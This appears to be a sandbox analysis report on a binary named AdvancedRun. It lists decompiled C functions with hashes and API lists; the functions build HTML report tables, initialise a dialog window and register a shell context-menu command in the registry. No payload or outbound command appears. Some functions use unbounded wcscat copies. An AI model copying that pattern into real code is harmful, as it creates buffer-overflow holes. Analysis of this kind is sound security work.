                                                                  • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                  • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 69%
                                                                  			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                  				int _v8;
                                                                  				void _v518;
                                                                  				long _v520;
                                                                  				void _v1030;
                                                                  				char _v1032;
                                                                  				intOrPtr _t32;
                                                                  				wchar_t* _t57;
                                                                  				void* _t58;
                                                                  				void* _t59;
                                                                  				void* _t60;
                                                                  
                                                                  				_t58 = __esi;
                                                                  				_v520 = 0;
                                                                  				memset( &_v518, 0, 0x1fc);
                                                                  				_v1032 = 0;
                                                                  				memset( &_v1030, 0, 0x1fc);
                                                                  				_t60 = _t59 + 0x18;
                                                                  				_v8 = 1;
                                                                  				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                  					_v8 = 0;
                                                                  				}
                                                                  				_t57 = _a4;
                                                                  				 *_t57 = 0;
                                                                  				if(_v8 != 0) {
                                                                  					wcscpy(_t57, L"<font");
                                                                  					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                  					if(_t32 > 0) {
                                                                  						_push(_t32);
                                                                  						_push(L" size=\"%d\"");
                                                                  						_push(0xff);
                                                                  						_push( &_v520);
                                                                  						L0040B1EC(); // _snwprintf thunk (see API ID below), bounded to 0xff characters of the _v520 buffer
                                                                  						wcscat(_t57,  &_v520);
                                                                  						_t60 = _t60 + 0x18;
                                                                  					}
                                                                  					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                  					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                  						_push(E0040ADC0(_t33,  &_v1032));
                                                                  						_push(L" color=\"#%s\"");
                                                                  						_push(0xff);
                                                                  						_push( &_v520);
                                                                  						L0040B1EC();
                                                                  						wcscat(_t57,  &_v520);
                                                                  					}
                                                                  					wcscat(_t57, ">");
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                  					wcscat(_t57, L"<b>");
                                                                  				}
                                                                  				wcscat(_t57, _a8); // no length bound on _a4 (the caller's buffer); its capacity is not visible in this function
                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                  					wcscat(_t57, L"</b>");
                                                                  				}
                                                                  				if(_v8 != 0) {
                                                                  					wcscat(_t57, L"</font>");
                                                                  				}
                                                                  				return _t57;
                                                                  			}

                                                                  Statement addresses (decompiler view): 0x0040ae90 to 0x0040afbd

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                  • API String ID: 3143752011-1996832678
                                                                  • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                  • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                  • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 97%
                                                                  			E00403C03(void* __eflags) {
                                                                  				void* __ebx;
                                                                  				void* __ecx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t88;
                                                                  				void* _t108;
                                                                  				void* _t113;
                                                                  				void* _t119;
                                                                  				void* _t121;
                                                                  				void* _t122;
                                                                  				void* _t123;
                                                                  				intOrPtr* _t124;
                                                                  				void* _t134;
                                                                  
                                                                  				_t113 = _t108;
                                                                  				E00403B3C(_t113);
                                                                  				E00403B16(_t113);
                                                                  				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                  				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73); // 0xfffffffc = GWL_WNDPROC: subclasses dialog item 0x3fd with E00403A73, previous window procedure saved at 0x40f2f0
                                                                  				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                  				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                  				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10)); // 0x80 = WM_SETICON, 0 = ICON_SMALL
                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14)); // 0x80 = WM_SETICON, 1 = ICON_BIG
                                                                  				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                  				 *_t124 = 0x3ea;
                                                                  				E0040AD85(GetDlgItem(??, ??));
                                                                  				 *_t124 = 0x3f1;
                                                                  				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                  				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                  				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                  				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                  				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                  				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                  				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                  				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                  				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                  				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                  				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                  				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                  				_t134 = _t124 + 0x78;
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                  				_t119 = 1;
                                                                  				do {
                                                                  					_t17 = _t119 + 0x280; // 0x281
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t119 = _t119 + 1;
                                                                  				} while (_t119 <= 9);
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                  				_t121 = 1;
                                                                  				do {
                                                                  					_t21 = _t121 + 0x294; // 0x295
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t121 = _t121 + 1;
                                                                  				} while (_t121 <= 3);
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                  				_t122 = 0;
                                                                  				do {
                                                                  					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t122 = _t122 + 1;
                                                                  				} while (_t122 <= 0xd);
                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                  				_t123 = 0;
                                                                  				do {
                                                                  					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                  					_t134 = _t134 + 0xc;
                                                                  					_t123 = _t123 + 1;
                                                                  					_t143 = _t123 - 3;
                                                                  				} while (_t123 < 3);
                                                                  				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                  				E00403EC3(GetDlgItem, _t113);
                                                                  				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                  				_t88 = E00402D78(_t113, _t143);
                                                                  				E00402BEE(_t113);
                                                                  				return _t88;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                  • SetWindowLongW.USER32 ref: 00403C39
                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 1038210931-0
                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 56%
                                                                  			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				signed int _v24;
                                                                  				signed int _v28;
                                                                  				signed int _v32;
                                                                  				void _v138;
                                                                  				long _v140;
                                                                  				void _v242;
                                                                  				char _v244;
                                                                  				void _v346;
                                                                  				char _v348;
                                                                  				void _v452;
                                                                  				void _v962;
                                                                  				signed short _v964;
                                                                  				void* __esi;
                                                                  				void* _t87;
                                                                  				wchar_t* _t109;
                                                                  				intOrPtr* _t124;
                                                                  				signed int _t125;
                                                                  				signed int _t140;
                                                                  				signed int _t153;
                                                                  				intOrPtr* _t154;
                                                                  				signed int _t156;
                                                                  				signed int _t157;
                                                                  				void* _t159;
                                                                  				void* _t161;
                                                                  
                                                                  				_t124 = __ebx;
                                                                  				_v964 = _v964 & 0x00000000;
                                                                  				memset( &_v962, 0, 0x1fc);
                                                                  				_t125 = 0x18;
                                                                  				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                  				asm("movsw");
                                                                  				_t153 = 0;
                                                                  				_v244 = 0;
                                                                  				memset( &_v242, 0, 0x62);
                                                                  				_v348 = 0;
                                                                  				memset( &_v346, 0, 0x62);
                                                                  				_v140 = 0;
                                                                  				memset( &_v138, 0, 0x62);
                                                                  				_t161 = _t159 + 0x3c;
                                                                  				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                  				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                  				if(_t87 != 0xffffffff) {
                                                                  					_push(E0040ADC0(_t87,  &_v964));
                                                                  					_push(L" bgcolor=\"%s\"");
                                                                  					_push(0x32);
                                                                  					_push( &_v244);
                                                                  					L0040B1EC();
                                                                  					_t161 = _t161 + 0x18;
                                                                  				}
                                                                  				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                  				_v8 = _t153;
                                                                  				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                  					while(1) {
                                                                  						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                  						_v12 = _t156;
                                                                  						_t157 = _t156 * 0x14;
                                                                  						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                  							wcscpy( &_v140, L" nowrap");
                                                                  						}
                                                                  						_v32 = _v32 | 0xffffffff;
                                                                  						_v28 = _v28 | 0xffffffff;
                                                                  						_v24 = _v24 | 0xffffffff;
                                                                  						_v20 = _t153;
                                                                  						_t154 = _a8;
                                                                  						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                  						E0040ADC0(_v32,  &_v348);
                                                                  						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                  						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                  						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                  							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                  						} else {
                                                                  							_push( *(_t157 + _v16 + 0x10));
                                                                  							_push(E0040ADC0(_t106,  &_v964));
                                                                  							_push(L"<font color=\"%s\">%s</font>");
                                                                  							_push(0x2000);
                                                                  							_push( *(_t124 + 0x68));
                                                                  							L0040B1EC();
                                                                  							_t161 = _t161 + 0x14;
                                                                  						}
                                                                  						_t109 =  *(_t124 + 0x64);
                                                                  						_t140 =  *_t109 & 0x0000ffff;
                                                                  						if(_t140 == 0 || _t140 == 0x20) {
                                                                  							wcscat(_t109, L"&nbsp;");
                                                                  						}
                                                                  						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                  						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                  						_push( &_v140);
                                                                  						_push( &_v348);
                                                                  						_push( *(_t124 + 0x68));
                                                                  						_push( &_v244);
                                                                  						_push( &_v452);
                                                                  						_push(0x2000);
                                                                  						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                  						L0040B1EC();
                                                                  						_t161 = _t161 + 0x28;
                                                                  						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                  						_v8 = _v8 + 1;
                                                                  						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                  							goto L14;
                                                                  						}
                                                                  						_t153 = 0;
                                                                  					}
                                                                  				}
                                                                  				L14:
                                                                  				E00407343(_t124, _a4, L"</table><p>");
                                                                  				return E00407343(_t124, _a4, L"\r\n");
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                  • API String ID: 1607361635-601624466
                                                                  • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                  • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                  • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 40%
                                                                  			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                  				void _v514;
                                                                  				char _v516;
                                                                  				void _v1026;
                                                                  				long _v1028;
                                                                  				void _v1538;
                                                                  				char _v1540;
                                                                  				void _v2050;
                                                                  				char _v2052;
                                                                  				char _v2564;
                                                                  				char _v35332;
                                                                  				char _t51;
                                                                  				intOrPtr* _t54;
                                                                  				void* _t61;
                                                                  				intOrPtr* _t73;
                                                                  				void* _t78;
                                                                  				void* _t79;
                                                                  				void* _t80;
                                                                  				void* _t81;
                                                                  
                                                                  				E0040B550(0x8a00, __ecx);
                                                                  				_v2052 = 0;
                                                                  				memset( &_v2050, 0, 0x1fc);
                                                                  				_v1540 = 0;
                                                                  				memset( &_v1538, 0, 0x1fc);
                                                                  				_v1028 = 0;
                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                  				_t79 = _t78 + 0x24;
                                                                  				if(_a20 != 0xffffffff) {
                                                                  					_push(E0040ADC0(_a20,  &_v2564));
                                                                  					_push(L" bgcolor=\"%s\"");
                                                                  					_push(0xff);
                                                                  					_push( &_v2052);
                                                                  					L0040B1EC();
                                                                  					_t79 = _t79 + 0x18;
                                                                  				}
                                                                  				if(_a24 != 0xffffffff) {
                                                                  					_push(E0040ADC0(_a24,  &_v2564));
                                                                  					_push(L"<font color=\"%s\">");
                                                                  					_push(0xff);
                                                                  					_push( &_v1540);
                                                                  					L0040B1EC();
                                                                  					wcscpy( &_v1028, L"</font>");
                                                                  					_t79 = _t79 + 0x20;
                                                                  				}
                                                                  				_push( &_v2052);
                                                                  				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                  				_push(0x3fff);
                                                                  				_push( &_v35332);
                                                                  				L0040B1EC();
                                                                  				_t80 = _t79 + 0x10;
                                                                  				E00407343(_a4, _a8,  &_v35332);
                                                                  				_t51 = _a16;
                                                                  				if(_t51 > 0) {
                                                                  					_t73 = _a12 + 4;
                                                                  					_a20 = _t51;
                                                                  					do {
                                                                  						_v516 = 0;
                                                                  						memset( &_v514, 0, 0x1fc);
                                                                  						_t54 =  *_t73;
                                                                  						_t81 = _t80 + 0xc;
                                                                  						if( *_t54 == 0) {
                                                                  							_v516 = 0;
                                                                  						} else {
                                                                  							_push(_t54);
                                                                  							_push(L" width=\"%s\"");
                                                                  							_push(0xff);
                                                                  							_push( &_v516);
                                                                  							L0040B1EC();
                                                                  							_t81 = _t81 + 0x10;
                                                                  						}
                                                                  						_push( &_v1028);
                                                                  						_push( *((intOrPtr*)(_t73 - 4)));
                                                                  						_push( &_v1540);
                                                                  						_push( &_v516);
                                                                  						_push(L"<th%s>%s%s%s\r\n");
                                                                  						_push(0x3fff);
                                                                  						_push( &_v35332);
                                                                  						L0040B1EC();
                                                                  						_t80 = _t81 + 0x1c;
                                                                  						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                  						_t73 = _t73 + 8;
                                                                  						_t36 =  &_a20;
                                                                  						 *_t36 = _a20 - 1;
                                                                  					} while ( *_t36 != 0);
                                                                  					return _t61;
                                                                  				}
                                                                  				return _t51;
                                                                  			}


                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                  • API String ID: 2000436516-3842416460
                                                                  • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                  • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                  • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 51%
                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                  				void* _v8;
                                                                  				void* _v12;
                                                                  				void* _v24;
                                                                  				intOrPtr _v28;
                                                                  				short _v32;
                                                                  				void _v2078;
                                                                  				signed int _v2080;
                                                                  				void _v4126;
                                                                  				char _v4128;
                                                                  				void _v6174;
                                                                  				char _v6176;
                                                                  				void _v8222;
                                                                  				char _v8224;
                                                                  				signed int _t49;
                                                                  				short _t55;
                                                                  				intOrPtr _t56;
                                                                  				int _t73;
                                                                  				intOrPtr _t78;
                                                                  
                                                                  				_t76 = __ecx;
                                                                  				E0040B550(0x201c, __ecx);
                                                                  				_t73 = 0;
                                                                  				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                  					L6:
                                                                  					return _t73;
                                                                  				}
                                                                  				_v6176 = 0;
                                                                  				memset( &_v6174, 0, 0x7fe);
                                                                  				_t78 = _a4;
                                                                  				_push(_t78 + 0x20a);
                                                                  				_push(_t78);
                                                                  				_push(L"%s\\shell\\%s\\command");
                                                                  				_push(0x3ff);
                                                                  				_push( &_v6176);
                                                                  				L0040B1EC();
                                                                  				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                  					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                  					asm("sbb ebx, ebx");
                                                                  					_t73 =  ~_t49 + 1;
                                                                  					RegCloseKey(_v12);
                                                                  					_v2080 = _v2080 & 0x00000000;
                                                                  					memset( &_v2078, 0, 0x7fe);
                                                                  					E00404AD9( &_v2080);
                                                                  					if(_v2078 == 0x3a) {
                                                                  						_t55 =  *L"C:\\"; // 0x3a0043
                                                                  						_v32 = _t55;
                                                                  						_t56 =  *0x40ccdc; // 0x5c
                                                                  						_v28 = _t56;
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						_v32 = _v2080;
                                                                  						if(GetDriveTypeW( &_v32) == 3) {
                                                                  							_v4128 = 0;
                                                                  							memset( &_v4126, 0, 0x7fe);
                                                                  							_v8224 = 0;
                                                                  							memset( &_v8222, 0, 0x7fe);
                                                                  							_push(_a4 + 0x20a);
                                                                  							_push(_a4);
                                                                  							_push(L"%s\\shell\\%s");
                                                                  							_push(0x3ff);
                                                                  							_push( &_v8224);
                                                                  							L0040B1EC();
                                                                  							_push( &_v2080);
                                                                  							_push(L"\"%s\",0");
                                                                  							_push(0x3ff);
                                                                  							_push( &_v4128);
                                                                  							L0040B1EC();
                                                                  							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				RegCloseKey(_v8);
                                                                  				goto L6;
                                                                  			}


                                                                  APIs
                                                                  • memset.MSVCRT ref: 00404452
                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                  • memset.MSVCRT ref: 004044CF
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                  • memset.MSVCRT ref: 00404539
                                                                  • memset.MSVCRT ref: 0040454E
                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                  • API String ID: 486436031-734527199
                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                  Uniqueness

